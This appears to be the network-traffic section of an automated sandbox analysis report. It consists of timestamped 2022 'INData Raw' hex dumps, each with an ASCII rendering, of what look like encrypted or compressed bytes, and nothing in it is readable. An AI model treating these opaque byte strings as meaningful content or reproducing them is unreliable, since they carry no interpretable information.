                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19816INData Raw: 7b 26 54 58 68 8a b0 5d c8 8f 34 31 18 bb d9 f4 51 d0 84 9e e6 0d fa db 80 84 a2 7d 57 41 a3 db 09 96 32 1b 76 1b 47 a3 02 a7 3d e8 1e ce 36 85 03 b8 8d f2 5a 9a a4 56 cd 25 d2 43 2f ab 43 81 d1 4a ec d6 7c e8 e2 5c e5 76 d9 64 28 2e 16 e4 ab 1c 57 b9 f8 31 ae 58 eb fc 55 5c b3 2a e2 f9 38 01 6b fd 42 d0 90 ed 54 f8 35 e7 01 fa 96 b4 ef ab 5d 0e 2c c7 f8 ff 61 f4 2c 73 29 5e 1f 20 ee af 5c b2 c0 27 64 43 5f 29 cb 0a 56 44 6d 33 a4 6e 0f 8f 6f 96 8e e8 94 5f d0 74 f4 03 d5 ad fc 7b ce a4 9c 59 47 bd 23 76 60 3e 38 e0 7b b0 56 0b 6d 78 df f8 2e dd a7 45 4a 66 e5 14 6c af 1b 39 1e 92 e1 bf d1 b8 e0 b3 b2 b8 bd 02 eb 5b 03 0b 9a 2f 47 9b 88 cd 0d 9a 36 e8 72 61 fa 46 53 68 70 68 c5 a8 7b 46 7f 0b a2 a2 ce cf a5 d6 06 6c 03 dc 5a 0e 5d c0 c9 89 ba 46 de a3 6f
                                                                                                                                                                                                                                    Data Ascii: {&TXh]41Q}WA2vG=6ZV%C/CJ|\vd(.W1XU\*8kBT5],a,s)^ \'dC_)VDm3no_t{YG#v`>8{Vmx.EJfl9[/G6raFShph{FlZ]Fo
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19832INData Raw: c3 c8 52 c2 d7 b3 ad 5c 19 32 37 47 54 6e 37 0d f0 c6 27 c3 a0 f8 21 72 6e 3b 26 df 41 98 5e 58 f3 a0 4e 98 3b 6e 19 e7 23 b2 18 d0 92 c8 75 f0 4f a9 4e 60 82 f1 b8 3b d3 ca 60 41 e7 1e 02 cd 26 d9 92 c5 1b b3 b5 86 5c 57 e2 22 52 8d 50 c6 d5 52 40 06 80 5b 32 16 20 5e 60 eb a6 ae 6c b3 7a 2f 0f 42 a1 04 0d da 25 3c ab d6 61 3c cf 0a 2b 14 e6 b4 b2 3d f5 7c f2 49 4f 1e c0 f3 4e 5d dd 25 5a 57 5a 55 d2 d7 a2 0e dd f1 eb 4a 42 c4 64 4f c9 04 cb b9 14 c1 e0 1f ee eb 39 9e 94 52 e9 65 99 1f ba ac f8 f0 99 f9 1b 5d 3f 1d 46 c5 17 b4 f6 33 49 19 55 b6 31 31 3b 5b 6f 3d f0 1d 5e b9 cf e1 5d 58 7a 2d 80 e3 a2 4c d3 e3 3f 71 e7 20 0d f3 57 26 60 3d 9e 54 2c c3 62 43 de 65 ac 45 b4 d5 ab 49 c3 0f 70 2b dd 7f 7b cb 60 03 0c 86 c3 4e 47 e4 2e 03 da 1d 1d 3e 68 01 f3
                                                                                                                                                                                                                                    Data Ascii: R\27GTn7'!rn;&A^XN;n#uON`;`A&\W"RPR@[2 ^`lz/B%<a<+=|ION]%ZWZUJBdO9Re]?F3IU11;[o=^]Xz-L?q W&`=T,bCeEIp+{`NG.>h
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19848INData Raw: a4 45 92 fe ae 4f 95 21 2a e8 c4 9c 67 38 a1 0f 57 e2 ee 82 0f 9a 80 9c 99 ea ae 43 0f f7 2b 2c 07 b8 4a 78 50 75 af 8c 37 61 a9 c0 78 ce 5a 39 dc 55 ea af 48 89 2f b0 69 27 b6 8f ae 37 7b f5 8e ed b5 7e 42 d8 e7 02 a4 02 4e f8 b8 c0 8f 1f ae df d6 c0 19 7c 7c 10 40 20 cc cf 6d 00 e8 58 6d df a6 c1 ff b9 eb 3e 2a a0 d5 97 f3 ce 41 4b b2 10 b9 f5 04 d3 b6 10 a9 9d 61 f1 90 5a 8f a8 7f d8 c6 03 55 12 c8 cc fb 74 de a4 e7 01 1e 69 a5 2e a3 00 29 1a fd 44 65 c2 5a f6 59 c1 4d 41 c8 9d 21 f8 43 69 59 a0 3b 12 d0 ee f5 57 ed cd fa 90 88 94 0d f4 20 65 dd bf ad 7d 22 5a 56 83 f1 30 27 1e b9 b0 dd 62 65 10 93 c9 57 b7 b9 d7 72 c3 32 6d 23 d5 52 cb 05 85 47 e0 b3 b3 13 08 40 d8 c2 8c 29 84 e1 0f 77 23 a7 90 89 1c 9a 47 0d 28 b8 f7 da 5d 29 10 88 11 50 3e 3b a5 0d
                                                                                                                                                                                                                                    Data Ascii: EO!*g8WC+,JxPu7axZ9UH/i'7{~BN||@ mXm>*AKaZUti.)DeZYMA!CiY;W e}"ZV0'beWr2m#RG@)w#G(])P>;
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19864INData Raw: 42 5a 05 ac 59 89 43 3d 74 ac 78 a4 2c e1 7e 0e 5c 85 ba 00 df 59 28 18 ce ea 34 e8 dc e3 53 9e 46 9c 56 4d 71 4a 69 0c 92 af ff e3 bc f4 94 e9 99 9f 3f ea b4 a3 5c 94 3e 72 cc 1a a7 c9 41 88 eb 45 c6 20 cf 17 c5 ff 63 8a eb 54 cd 6b 4f 84 92 92 4d d6 5b b5 e8 71 30 41 07 6d c9 86 a7 d1 0a 3d 12 bb 01 5f d0 91 e3 30 85 32 a6 cd 8e 63 b0 22 1d b7 16 5d 83 ef 7f 0b bb 78 61 d2 fd 48 64 39 36 07 df 5f c4 1e 7b 80 a8 34 1f 4a 85 0d 5d 8b 8d e5 3f d9 c7 2c e9 63 77 b8 5b 62 a3 65 96 34 f7 68 7f 8f 0a ae 43 44 9e 10 22 57 75 06 70 fa 98 12 e8 db d8 ed bd f8 ab 3b 6e a2 cb 82 7b 3b af 22 26 63 1c 43 d1 04 61 87 92 cf 70 27 b7 5e 3f b7 6f c1 7a 93 98 c0 b9 61 ed 26 82 88 43 a4 10 14 f4 c0 a2 86 3d 2d 1b e9 88 1f a1 1c 52 d0 0e 98 44 4f 6a 3a 43 15 ff a0 9f 42 91
                                                                                                                                                                                                                                    Data Ascii: BZYC=tx,~\Y(4SFVMqJi?\>rAE cTkOM[q0Am=_02c"]xaHd96_{4J]?,cw[be4hCD"Wup;n{;"&cCap'^?oza&C=-RDOj:CB
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19880INData Raw: 1b b4 37 b6 cc 3d 69 08 25 fa 8c b1 80 48 20 38 6f 79 66 a5 42 d2 7b b0 6e 7f 23 f8 c2 8a ba 55 03 4d ec 0c 6b e7 22 d9 d4 a3 a2 52 a1 6d 32 70 d3 88 4b 26 bd 18 31 c5 4e c2 f6 48 b0 4d fe a7 6e bd 09 1f 24 43 18 b7 cd 9c 4a a4 d9 d4 d8 00 8b bf bc 05 9b 52 4a ed a9 be 4d cf 01 b4 50 53 43 88 d2 dd 2f e0 de 1d 63 6c aa 3e 74 ff 55 77 8b 0c 2f 3e 75 a1 8f 8a 15 7f b0 c1 d1 b7 f4 b7 e0 98 8a e5 7b 1a ce 4d 8c b4 11 57 cc 2d 00 4a 0d a9 69 ce c1 ff dd 7c 9f 60 eb 96 a8 0b e6 4a 9a 60 4e a5 5a 1a a6 92 7f bc ab 92 fc de 94 e1 8f 79 40 11 14 eb 8c 6a da 72 a8 0f 66 e1 1d 1b 09 00 96 6c 9d 4f 07 4d 80 94 a5 b5 d6 38 57 41 31 c4 f8 3b 87 e9 b2 f8 63 c8 0c 12 2d 6f 4e 48 03 25 2e fa 6e 98 83 82 74 02 16 36 7b e3 0a 0b 40 c8 76 3b 53 ba 6b 84 f6 44 1d 7f 42 89 8d
                                                                                                                                                                                                                                    Data Ascii: 7=i%H 8oyfB{n#UMk"Rm2pK&1NHMn$CJRJMPSC/cl>tUw/>u{MW-Ji|`J`NZy@jrflOM8WA1;c-oNH%.nt6{@v;SkDB
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19896INData Raw: d8 e0 83 d0 01 a4 24 be c0 38 01 51 c7 83 25 9e 08 16 e5 dd 2d b2 29 bc 4b 3b d0 ff ec 9b 43 9d fd 1f 79 92 13 9e d9 9f c9 ef 19 55 c7 7d 4b ec ee 38 64 c3 a7 9e 52 19 a4 0a ed 15 1a 57 42 55 c3 8c 24 3a 8c 79 07 95 83 db c9 25 c1 93 32 8a 4e bf 26 42 f8 9d 90 15 42 14 2e a3 50 72 e9 27 96 04 fa 0f 69 d0 4c c5 d5 f7 d2 c0 90 d3 2a 6e 2b 9a 22 78 e8 38 c3 9f e6 39 c8 9c 57 0b 7b 96 fe 99 5e c9 80 41 e5 9a 26 31 aa 48 15 3b fa b6 9a 4f a2 63 03 ad 21 95 c5 5a 9b a2 e9 2b 07 49 5d 2b 99 69 2e 33 54 cb 18 36 6b 46 6d d7 59 e7 43 4a 50 9c f9 28 2c dd 6e 1d 48 df ca c5 bd 3f 49 04 46 8c 5a 66 1b 87 3f cf df f8 6e 03 38 5f 49 e0 6e 7e 8c 30 29 98 e4 5e f4 31 13 cb 6c 7d 24 fe 03 dd 85 95 5d d4 bf 20 a1 08 f0 b6 18 a5 48 8e ea 5f 11 24 13 8e 29 cf b6 c7 ff ad 2f
                                                                                                                                                                                                                                    Data Ascii: $8Q%-)K;CyU}K8dRWBU$:y%2N&BB.Pr'iL*n+"x89W{^A&1H;Oc!Z+I]+i.3T6kFmYCJP(,nH?IFZf?n8_In~0)^1l}$] H_$)/
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19912INData Raw: e7 f0 98 ba ad 42 56 08 31 9e 02 24 c8 71 41 1c c1 0e 41 85 df bc f3 c4 94 67 a8 8d ba 2e c4 e1 b2 a0 30 8f bb f7 9a 07 4c 81 62 41 ef 4f 9a 41 61 fb 62 c5 0d 54 3e 4b 4a 54 11 db aa 9a 22 43 45 44 ed 5d f3 56 bc 19 bb e5 2d 20 ee 7e a2 af f0 07 a6 17 d3 be 3f 13 8c dd da 9a cc f8 31 bc 4e 25 70 70 02 09 f4 72 f8 49 82 9d 71 3d 0a 6e 6c 01 14 a1 d7 45 d6 7f 57 ce 8a 85 29 78 4f cd 49 a6 da 91 a4 6e ac 18 7c 22 a8 86 73 44 fa a7 46 67 69 d9 79 de 94 34 a0 07 96 51 b5 31 38 b3 2d 32 3b f4 b2 7a 11 06 d5 51 e7 d2 8d 2a 95 eb 08 28 4e 00 8a 99 ac 53 b9 a5 fc e6 d9 e0 f4 19 45 56 42 20 a6 cd ab 94 8f 79 97 24 de 6b 19 e8 88 00 f9 ee e2 03 7e d3 84 61 a8 57 20 81 29 a6 2d 9f a2 5b c6 29 cb 05 82 c7 7c b3 b4 de ca a5 fe 1a 9c 48 a6 be c5 09 13 f4 ba 71 26 a3 72
                                                                                                                                                                                                                                    Data Ascii: BV1$qAAg.0LbAOAabT>KJT"CED]V- ~?1N%pprIq=nlEW)xOIn|"sDFgiy4Q18-2;zQ*(NSEVB y$k~aW )-[)|Hq&r
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19928INData Raw: e9 a5 97 bd c2 45 86 7f f2 7f 42 5b 00 e7 94 6c 00 9d 71 09 68 fb 70 26 e3 42 d9 93 86 b2 5b 68 ca 7d a3 b5 bf 37 57 3a 19 72 0c 6d 0f c7 d3 a9 73 c7 3e aa cf cc 5f 95 92 c9 db ac f2 fe 3f 7d af c8 89 ab 5c 5d ac 44 6e 71 27 2c 7f ed dc 48 4b 29 59 a3 f6 3b 5a 0c 51 e8 2e 55 e8 fe c2 b6 45 29 af a8 44 d9 70 d7 50 d3 ec 3d fa dc 3c 4e 17 91 66 9d 26 30 9d 09 8c 93 86 1d 88 54 6f 16 e0 0c 45 01 bd 7c 22 51 2d 31 43 5d 1b 5f 63 d0 53 f2 32 83 0c d0 26 df e0 1b 21 79 b4 8a 28 bf 8b 4f bf c2 09 de e3 03 49 8e cd 95 b9 b1 20 0c ca ca cd 8b b7 ec e8 95 13 11 a3 28 1c 1d 38 6b 69 aa 88 5e c6 dd 97 e8 81 58 86 35 0f b3 72 7f be d6 9d ce 23 8e a7 e0 64 7a dc 3f 8f 80 5f ba fc b8 f6 26 3d fd d8 ca 6f 38 0a 3c 2c f5 73 e5 15 17 0b 01 54 3f 22 6f 08 a6 05 28 cf bd 9a
                                                                                                                                                                                                                                    Data Ascii: EB[lqhp&B[h}7W:rms>_?}\]Dnq',HK)Y;ZQ.UE)DpP=<Nf&0ToE|"Q-1C]_cS2&!y(OI (8ki^X5r#dz?_&=o8<,sT?"o(
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19944INData Raw: 7e c9 8d 0d 1f 3e 01 f4 ab 00 72 f7 e6 a1 1b a9 f2 26 18 cb c3 70 c2 de 96 5e 22 53 0d fd cb f2 57 54 f0 91 88 0e 20 53 54 81 f9 f3 0c 04 a0 39 ac cd b2 22 cf f6 16 fc 6d 38 49 99 6a a4 bf 47 0b 30 cf 12 b5 78 23 3c 99 0d 2c 74 8b 77 20 83 da cd bf c3 6b b2 22 e3 ca af 96 2c 5b 4d c3 6d ce 29 76 63 18 b9 f8 60 8c 70 67 48 ec 10 57 6b a7 1b 8f 35 8c 76 75 6b a4 64 ad 7b 1f 29 3b 05 d8 b7 b2 bd 48 06 d3 92 58 8e 19 90 d2 93 38 4d 29 56 c7 ab c5 5e 7f 05 27 ad 1e 1f 2a eb 2d 12 a4 12 af 6b 2b 73 1b 61 bf 1a 8a e3 a3 2e d8 86 e2 26 9a 35 b4 18 b0 87 92 41 a5 a9 5b 9b bf 7f 9e 3f 30 9a 67 52 db 94 56 9f df 11 30 55 63 cb ad a5 90 8a 44 6f a7 f6 ab ba bd 0c e9 c2 0b 45 0a 58 1f 12 a4 6a 39 d4 5b 57 16 8d 0f b5 37 52 1c 2a 51 cf bc d5 91 79 80 d0 94 a7 29 11 30
                                                                                                                                                                                                                                    Data Ascii: ~>r&p^"SWT ST9"m8IjG0x#<,tw k",[Mm)vc`pgHWk5vukd{);HX8M)V^'*-k+sa.&5A[?0gRV0UcDoEXj9[W7R*Qy)0
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19960INData Raw: 1c ad 80 8f 45 4e 68 0e e4 d3 22 30 b4 3f a0 c0 08 fd 2d 6a 8c 32 d4 58 73 1f d9 9c fd 86 ee f7 99 f9 bf f1 68 a2 8c 40 44 0e 8c 3b 39 47 8f a1 ad e3 b9 7e 28 11 54 6a 9b 14 b4 61 db 5f 36 88 76 b6 c8 15 64 3d 3b b5 99 18 cf db b7 11 56 b5 b0 93 71 54 16 8f 1d 2f 3e bc 78 e0 41 c1 61 be 04 5b a4 e6 3b bc e9 6d 47 53 51 45 7d 4f d4 2b 03 4b 55 23 f3 c4 15 47 47 69 3d a1 e6 48 4d ee 89 7b 33 84 99 73 7c 19 0b 97 f5 b4 1f 28 69 57 08 9d 8a f4 8e 3c 58 e2 9d ee ae f0 8a b7 6b a9 27 d8 50 fd aa 63 3b 5e c4 92 d2 71 7e 06 10 18 80 1d 85 61 2b 24 84 42 4a a0 e9 83 76 e1 71 ff 5d af 97 8e 3c e2 f2 0c 54 10 d1 3f 60 60 06 13 4f 98 51 ee 72 67 8e 09 ab 6b f4 dd b2 5d fb eb e5 d3 45 20 e8 ac 7c 9f 50 60 27 ff b2 6a 9f ed a9 50 a1 09 4d 11 80 dc bc 32 92 3a eb 30 0b
                                                                                                                                                                                                                                    Data Ascii: ENh"0?-j2Xsh@D;9G~(Tja_6vd=;VqT/>xAa[;mGSQE}O+KU#GGi=HM{3s|(iW<Xk'Pc;^q~a+$BJvq]<T?``OQrgk]E |P`'jPM2:0
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19976INData Raw: ce a4 a2 2c 5e 20 9f ac 76 9e 12 6b f9 98 ed e9 5a 09 14 66 e6 7d 49 71 03 17 db 94 ba b8 19 21 85 76 c3 b0 5e d9 c0 8b 8c ac 1d 1c 85 e1 c4 f6 9b 25 63 61 35 68 f2 dd 1f 49 50 94 77 46 ea be f9 d1 34 62 01 66 fa c5 5f 37 ce 11 a0 d9 92 4d 48 e5 09 45 40 98 91 80 f3 b2 84 f7 40 1a f2 0f 17 0b be f0 6e b3 70 2b 58 ed d0 55 88 6c 7d db b1 e9 f0 23 37 66 c1 6e 0e 4f d1 ca 0f a6 6e 2f 8d 93 e3 20 ca 2b 86 07 42 06 c5 f9 18 73 d7 7e 88 6e 6d ef e9 1c f5 20 82 12 c1 7a 4f 52 30 c3 f8 0e b9 7f bb 56 29 03 89 55 56 cc 2e 16 48 c0 83 f0 a0 7e 47 94 2a d6 39 a5 7e 76 00 76 78 be 09 3d 71 92 31 cf bf e9 f6 64 4d f0 37 ca d5 8f 8f ba 2d b1 8d d1 7e 5b 80 1c 1f 9e ef ff a8 03 f4 7c 05 af d8 40 89 39 68 af 1d 45 26 ec f5 ac 42 2b 91 f2 67 86 f5 32 7e 00 5d 46 a6 bc 18
                                                                                                                                                                                                                                    Data Ascii: ,^ vkZf}Iq!v^%ca5hIPwF4bf_7MHE@@np+XUl}#7fnOn/ +Bs~nm zOR0V)UV.H~G*9~vvx=q1dM7-~[|@9hE&B+g2~]F
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19992INData Raw: 67 bd be 95 8b 70 05 33 59 ec a0 eb 74 8b a9 47 96 08 1e 04 a0 52 23 ca 6f 47 a7 56 b3 cb c9 ca 26 a1 03 d8 b8 3d dc a1 27 07 dd f3 ea d4 d3 ec 7c 6f 25 d7 67 ee f8 be be e9 2f f5 aa 33 e0 0a b5 31 5c a1 97 5d c5 cc 6d c7 16 98 e0 68 d9 90 6d 1f a5 4b 1c 8c 23 df 01 c2 03 f6 b6 63 01 3e 02 e2 32 6a 68 4d f8 a7 3f 22 04 06 fa f2 97 07 26 87 bc de e1 68 24 f6 c5 23 e9 97 6b 64 98 23 ec d9 08 37 57 2c f2 34 0c d7 d1 d0 30 0a 3e 90 f2 69 13 e6 77 3e 42 db 1c b5 a4 df 0d e5 e6 88 c4 ab c0 65 e3 53 6b e6 c7 59 8e 44 e8 fe 9b d5 d8 fe 87 ae e7 05 0f 8e c5 6d 97 c4 ec 51 2d 49 4c ce 93 fe 2a ef 26 06 45 2c 5d d0 2f 53 bc 75 b8 54 52 b3 88 35 49 08 bd b5 4b 15 c8 4b 50 e8 c0 6b 9f 2c 83 3c 71 84 70 de 29 5f a2 c5 46 b0 41 4e c3 23 4f 58 ca 00 b2 ac 5a f2 01 96 23
                                                                                                                                                                                                                                    Data Ascii: gp3YtGR#oGV&='|o%g/31\]mhmK#c>2jhM?"&h$#kd#7W,40>iw>BeSkYDmQ-IL*&E,]/SuTR5IKKPk,<qp)_FAN#OXZ#
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20008INData Raw: 13 f5 e6 8e d9 13 b5 b9 15 26 d9 03 19 9e b7 62 80 b7 96 b8 2b 98 ba 9c 92 fa 63 52 62 13 a1 b3 19 a7 b7 ef 0b cc d7 4c 53 0c dd 0f 33 78 09 b6 f2 2f ea 3c 46 b5 9f 20 42 ad cf 36 19 ca 98 66 d6 ae 85 c6 c4 38 f0 f5 04 66 d4 bd f4 67 f4 67 8d 70 39 1d 7c ef 9a 64 dc 4e 05 37 00 b7 dd f8 1e cc b8 c6 d4 16 d3 bb f1 37 9b be f5 1b 6a 23 c9 e8 0b 42 fe eb 35 92 b2 f5 44 80 a5 dc be b5 9c 69 e3 f0 6b 6e 77 c1 aa 6d 7a 69 15 8f 61 9a c7 a7 02 9c 54 75 41 04 38 b0 f9 4a c0 d5 0e b6 41 db 51 35 6b f2 9e f4 c8 f6 df cd 78 3c 67 20 c7 be b1 9f 6b f8 88 a9 69 d2 4a a6 16 15 2f 09 a3 d3 41 62 70 4a 98 f3 2a ca 6d 79 38 7b 95 41 64 b3 33 1a 47 25 b5 51 41 37 37 8d 2b 29 cb 03 fe 3c 5d db 00 df 72 f1 46 25 a9 28 ed 46 3f bd 3a 0b 90 f3 41 d7 ff 50 b8 95 b6 12 5c e4 3c
                                                                                                                                                                                                                                    Data Ascii: &b+cRbLS3x/<F B6f8fggp9|dN77j#B5DiknwmziaTuA8JAQ5kx<g kiJ/AbpJ*my8{Ad3G%QA77+)<]rF%(F?:AP\<
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20024INData Raw: 32 da 64 4a 3d 7d a2 ce d3 ad bf 91 4c 85 43 cb f9 78 f8 dd ba 1c 28 5d 16 20 0d 58 f8 c8 cf 66 aa 5f b9 05 92 f8 58 06 43 9e ea da 8e ac 76 3e d0 26 96 d0 fc a1 6f 33 6a 36 49 d0 7f d1 e4 2f f1 58 36 3c e4 f3 b1 8f 8f 1f 72 46 a3 42 6d ad 7d 8d a9 47 74 20 ce 4f fd 7e c0 05 0c c1 25 c3 3a fd 3d 6c 7b d4 50 c6 b9 c1 f7 e0 7f 04 03 10 1c 12 0b 75 29 c5 17 54 d3 01 7d 3f c8 0e c0 b0 3c 80 8a 5e e7 7e a8 5f 2c fe 88 d5 2e 37 c0 e5 47 51 c8 1a 8a b8 b8 48 06 be 09 d9 22 0d 5b 62 69 d6 21 47 d0 2b 9e 18 91 a3 c6 b3 af 35 34 41 3f 99 3e d7 f0 77 5b b3 a4 cd 8b 02 45 17 78 0f 31 14 ad ba e8 4a d3 6f 6c 15 5e a0 64 78 e5 ce ca 82 56 29 f4 af d2 31 53 91 78 38 7d 54 5d b1 53 e2 f6 9c 87 39 6f 02 77 ee 8a ed 07 c4 6d 9e 9d 18 fd f5 e7 24 72 af 67 99 16 a4 4f 1e 28
                                                                                                                                                                                                                                    Data Ascii: 2dJ=}LCx(] Xf_XCv>&o3j6I/X6<rFBm}Gt O~%:=l{Pu)T}?<^~_,.7GQH"[bi!G+54A?>w[Ex1Jol^dxV)1Sx8}T]S9owm$rgO(
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20040INData Raw: 34 68 d8 9e a8 20 03 4c cc c7 e0 2b 1a 6f c7 51 88 5d 9b f0 65 ea d8 ba 63 a1 4b 63 41 bb 24 cd 7c c9 6c 74 a8 10 34 2e 55 da 29 a1 b3 1b 5d 5f d5 82 69 54 3e 39 5a bd 64 c9 61 30 c3 3a e3 79 ef 6c 3d a5 e8 0d cc 92 d3 74 8c 2b 5c 47 06 a9 83 99 cc 16 14 b7 0f d5 94 bb 09 1d da da 47 49 14 af 5d 98 02 a6 a4 81 85 83 75 29 fe 0a 29 7f 82 c8 68 5e f6 9c 48 a4 18 28 78 1f 32 29 4d 86 fa d0 4b bf 4a 5a 92 1d f5 29 7e 48 a6 00 b7 db b0 e2 45 4a 32 eb 4b 48 a5 f8 9b 83 4a 15 ea 01 fb 69 98 42 af 21 43 2e ff 20 a3 c6 ad d8 44 8f db b3 0d 71 49 d8 c1 9a 31 b8 13 fa af cb c0 d3 f0 0a 45 bd 1b 60 32 26 f6 42 1c 95 52 90 81 7a eb d2 fd f5 95 bc 8a 31 8e 22 99 8d ca ec df 66 ef 76 eb 7a 2d 8a 51 07 3b a7 db 9c 41 73 94 56 aa fa 1b 7a f5 05 56 da c3 a3 11 92 21 64 d6
                                                                                                                                                                                                                                    Data Ascii: 4h L+oQ]ecKcA$|lt4.U)]_iT>9Zda0:yl=t+\GGI]u))h^H(x2)MKJZ)~HEJ2KHJiB!C. DqI1E`2&BRz1"fvz-Q;AsVzV!d
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20056INData Raw: d3 e6 ae 1a 16 23 eb e2 64 b9 db a5 7e 21 6e 23 03 9f 1f c3 ae 10 e8 b8 0f 58 ae af 10 5b a9 bc b7 e8 62 07 bd c6 90 2e 10 7d 38 1d 73 bd bb b6 9f aa bf 9b 99 8f f0 85 a9 a9 53 8f 96 78 6e 02 db d8 ab 9d 92 77 67 af d8 43 6a a3 4e ec 86 1a 10 2f 27 08 20 d2 49 be e6 53 be 53 18 85 19 e2 54 bc d9 fd cc 11 09 e9 96 57 46 11 d7 83 44 4a 5c 4b 84 15 70 cb ae 8f 3f fc 68 51 98 63 c9 0e 4b eb fb b0 87 ca a1 c4 28 a5 a0 cd 88 08 5a af 01 8c 41 95 79 15 01 16 5a dc 8a cc 0d b6 23 1c 9f 99 79 19 26 60 1a 31 c9 90 67 c2 90 2b b7 ed 1c 1e de 39 21 1c ec 44 7e b2 32 dc a2 a3 5e 9d 0c 4c 63 17 fa b3 2e 73 04 d0 ff f2 56 68 e5 c6 47 4a b4 ea ec 11 ba 2f 5a 0a 51 16 49 b4 08 ce 52 14 d0 e6 72 ca c2 4a cd 47 50 64 a6 3d 60 5b 60 cd 0a 8d 68 9c d0 71 24 bf c3 41 c9 04 26
                                                                                                                                                                                                                                    Data Ascii: #d~!n#X[b.}8sSxnwgCjN/' ISSTWFDJ\Kp?hQcK(ZAyZ#y&`1g+9!D~2^Lc.sVhGJ/ZQIRrJGPd=`[`hq$A&
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20072INData Raw: 21 e4 c9 c4 2c 8b 44 56 f2 83 b5 16 1f 90 aa 95 8c 8f d8 dd 5b a3 bf 12 2f be 93 b8 53 81 94 4a 3f 3c b3 72 16 d5 b5 20 48 63 6c 12 07 0c 05 b4 fc 8c ac 6b 97 61 eb 5a 67 8e c7 28 56 65 8a 53 3a e2 ad 95 49 18 3e eb 69 65 0d 58 39 17 59 a3 22 49 06 80 f3 26 14 a6 2b 32 b5 9d 93 b2 0f 31 9b 14 15 72 49 0c 3c ad 08 c4 ab aa 93 44 64 e0 2a 2d 09 d4 1c 62 16 d5 fc e7 e4 f8 72 c3 c3 42 c8 25 2f f5 42 64 ca e3 7e eb 03 42 b0 d3 fa ff 25 6c 8f 97 88 33 f0 8e ca 4b cc 01 27 ed cf e1 0a 56 b8 48 cb 68 4a d2 18 f5 17 25 06 96 de a3 1f d1 6c 56 50 a4 b2 b4 e4 0a e6 c2 c5 f0 43 1b 57 50 f5 5f e7 79 ff ac 5f 43 b3 66 60 05 be d7 e2 f0 76 af ba 6c c4 c2 e1 6b 6c 3b da 95 ac e4 8e d6 ee 84 61 d2 70 55 c2 14 6e 45 d8 35 7f 1b 53 6e 3d 7f 9f f5 a2 c8 1e e3 c5 c9 7c d9 9a
                                                                                                                                                                                                                                    Data Ascii: !,DV[/SJ?<r HclkaZg(VeS:I>ieX9Y"I&+21rI<Dd*-brB%/Bd~B%l3K'VHhJ%lVPCWP_y_Cf`vlkl;apUnE5Sn=|
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20088INData Raw: 91 97 08 46 8e 12 25 1b 6a a4 b6 ea 92 e8 7d 16 94 fb fb c0 8e fb 84 af 68 f9 b5 61 04 6f 2e 48 ee 1c 58 c4 bc 3c 6c ac c1 61 c9 3e 46 3a 62 42 a0 8e 93 92 a3 88 68 45 cc d0 62 54 90 27 ee f0 1f 4e 5c 7c 81 52 fd 2e 78 6a 50 c2 54 2b a3 77 ee b6 d7 69 73 4c b4 c4 ce 60 56 46 8d 68 0d 98 b5 f0 eb 71 20 71 2b 98 f9 6d 34 16 cc e3 40 bf 81 b2 6a 58 d3 e2 90 c8 5b 62 44 1d 71 67 6e 0b 2e e5 1b 54 5a 80 01 a5 af a8 b6 8e 5f a8 10 72 55 8d 42 da 64 f0 c1 80 bb ea 8d ea 9b 53 79 aa 09 1d 4a 9b 8a b5 96 f6 47 4f 6a 1e fb a1 09 70 94 8c db 02 a2 9b d2 44 ba 49 f8 c4 2b cb a2 78 d7 f9 1a 4b 7f cd de 43 f7 7a 32 c5 ae e1 93 3d 84 c1 e4 c8 9d 88 60 76 4f e4 00 45 43 83 3f 94 b2 1e 8c 85 f0 57 9f fa ed 4b e4 6d 17 27 1a 87 f8 f2 1b 3e 14 2b be 06 3e 6a e2 c6 1f 2f 59
                                                                                                                                                                                                                                    Data Ascii: F%j}hao.HX<la>F:bBhEbT'N\|R.xjPT+wisL`VFhq q+m4@jX[bDqgn.TZ_rUBdSyJGOjpDI+xKCz2=`vOEC?WKm'>+>j/Y
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC20104INData Raw: 91 43 0a 55 d8 a6 9b 30 f2 ea 9a f7 4e df 02 e0 b7 6f 05 57 60 5e 48 22 aa 20 92 8f 87 17 48 9c 0f ae 04 26 32 d2 5d 6e 4d 0d 4b b5 2b b1 a5 82 0e cc a3 24 85 05 a8 64 d0 7e 3c e5 d9 86 4f 13 1e ce 72 8f 10 85 73 56 d6 4d 8a ff 29 81 60 d6 0a e6 dd 3b fc 7f d2 80 98 30 75 89 30 77 43 f7 35 35 77 46 14 97 a6 19 7e 5c 63 63 03 af 67 a5 79 0a 7d 6a af 94 40 d3 12 eb 93 b3 54 f4 34 d5 87 52 56 d6 2e 5a f6 b0 a3 6e ab a1 88 62 22 63 ae 1f b4 fa 96 99 f7 0d 91 6c b1 64 ce 81 5b 63 a3 4c 96 c1 2c 15 d9 e9 53 c4 13 30 fb e2 f1 6b d2 04 4e f5 0e 93 dc 08 bb 33 63 53 88 00 bb 05 39 84 b2 89 25 22 35 f2 8a fe dd 31 f4 9c 81 92 9c 40 a4 6d 85 8e 32 a7 20 f5 9b e4 94 e5 6e 79 76 36 25 3c 49 76 0e 66 b4 09 07 b7 a1 a5 de e4 e5 87 3a ae f1 09 6e f0 13 0e e0 9a 59 60 25
                                                                                                                                                                                                                                    Data Ascii: CU0NoW`^H" H&2]nMK+$d~<OrsVM)`;0u0wC55wF~\ccgy}j@T4RV.Znb"cld[cL,S0kN3cS9%"51@m2 nyv6%<Ivf:nY`%
